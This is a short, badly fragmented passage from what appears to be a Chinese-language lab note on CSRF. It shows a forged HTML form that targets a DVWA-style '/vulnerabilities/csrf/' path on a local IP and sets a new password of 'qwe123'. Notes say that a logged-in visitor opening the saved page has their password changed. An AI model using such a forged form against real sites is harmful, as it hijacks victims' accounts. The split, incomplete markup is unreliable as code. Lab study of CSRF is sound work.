首页
CSRF
1
6
"
http://192.168.1.120/vulnerabilities/csrf/
"
method=
"
GET
"
>
7
New password:
8
"
password
"
AUTOCOMPLETE=
"
off
"
name=
"
password_new
"
value=
"
qwe123
"
>
9
Confirm new password:
10
"
password
"
AUTOCOMPLETE=
"
off
"
name=
"
password_conf
"
value=
"
qwe123
"
>
11
"
hidden
"
name=
"
Change
"
value=
"
Change
"
/>
12
13
14
改成html后缀
别人点开页面时就会更改密码(在已登录状态)
漏洞知识
相关
标签